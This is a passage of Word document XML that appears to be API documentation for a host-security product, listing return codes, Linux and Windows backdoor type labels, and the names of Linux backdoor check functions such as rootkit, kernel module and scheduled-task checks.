      <w:tr w:rsidR="00497C54" w14:paraId="619FFE87" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3312463A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>retcode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F1CECC5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73B42944" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1D1C5E2F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51F45F60" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>retcode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26FBDA04" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26E793C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6455E958" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="308" w:name="linux后门类型"/>
      <w:bookmarkEnd w:id="307"/>
      <w:r>
        <w:t>linux后门类型</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1585"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1322"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="51BE786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EE5BE9E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ECE9195" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35B3E755" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2024EC2A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="131ED18E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>backDoorType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2059F3E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>应用后门</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35EEAB0D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>应用后门</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="28464A37" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4384C3F3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>backDoorType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="575E200F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Bootkit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5100D709" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Bootkit后门</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="63FB985E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B99E092" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>backDoorType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49490A8B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Rootkit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1226579B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Rootkit后门</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46113DCB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="309" w:name="linux后门检查功能"/>
      <w:bookmarkEnd w:id="308"/>
      <w:r>
        <w:t>linux后门检查功能</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2263"/>
        <w:gridCol w:w="2641"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="7A618FA0"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1E7C60F3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24A019B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D06D68C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="22670399" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BCFD401" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>backDoorCheckName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F04ECFA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>RPM-based应用后门检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B03F8A7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7A9E0170" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6501D1C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>backDoorCheckName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11D8DCC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>DPKG-based应用后门检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="479A0426" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="07EE6C0C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AAA2B83" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>backDoorCheckName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D5403F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>磁盘MBR检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B28666E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="78A41EDA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60B3B2FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>backDoorCheckName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68E6A1AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>计划任务检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72D536CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4C4AF555" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B407D04" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>backDoorCheckName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0408EAFB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>动态链接库检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="652B6191" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="368A79B7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72B288CE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>backDoorCheckName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46373940" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>基本命令检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F9C342D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="229F3EB6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="796C3360" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>backDoorCheckName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46FBD82B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>已知rootkit检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46A0D1D9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6CA1BF5B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52358D87" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>backDoorCheckName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B8363D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>系统内核模块检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A99E2E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2B44DBB9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1436FC4C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>backDoorCheckName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C79BB5D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>网络状态检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0515AAC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="50E70770" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BAE1CBB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>backDoorCheckName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3190E137" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户状态检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E1CC610" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2C61B6DA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A15334C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>backDoorCheckName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A5DBBC2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>系统文件状态检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68F8D073" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6CF095B5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BB09253" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>backDoorCheckName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FEA5EC7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程状态检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D42F652" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64AC2C80" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="310" w:name="windows后门类型"/>
      <w:bookmarkEnd w:id="309"/>
      <w:r>
        <w:t>windows后门类型</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1767"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1201"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="254ADE6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C340C22" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33C241D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E6434D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7069A18B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4442591A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>backDoorTypeId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40610BD1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="660F34CE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>未知类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="25D3EBD0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F67421E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>backDoorTypeId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57602CAC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F9EB008" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>可疑进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="52785E63" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E0A5A49" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>backDoorTypeId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E36868C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CD49582" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>可疑线程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="204690D9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EC9E4B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>backDoorTypeId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="525817C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1894D1F0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>可疑模块</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="400EF7E9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
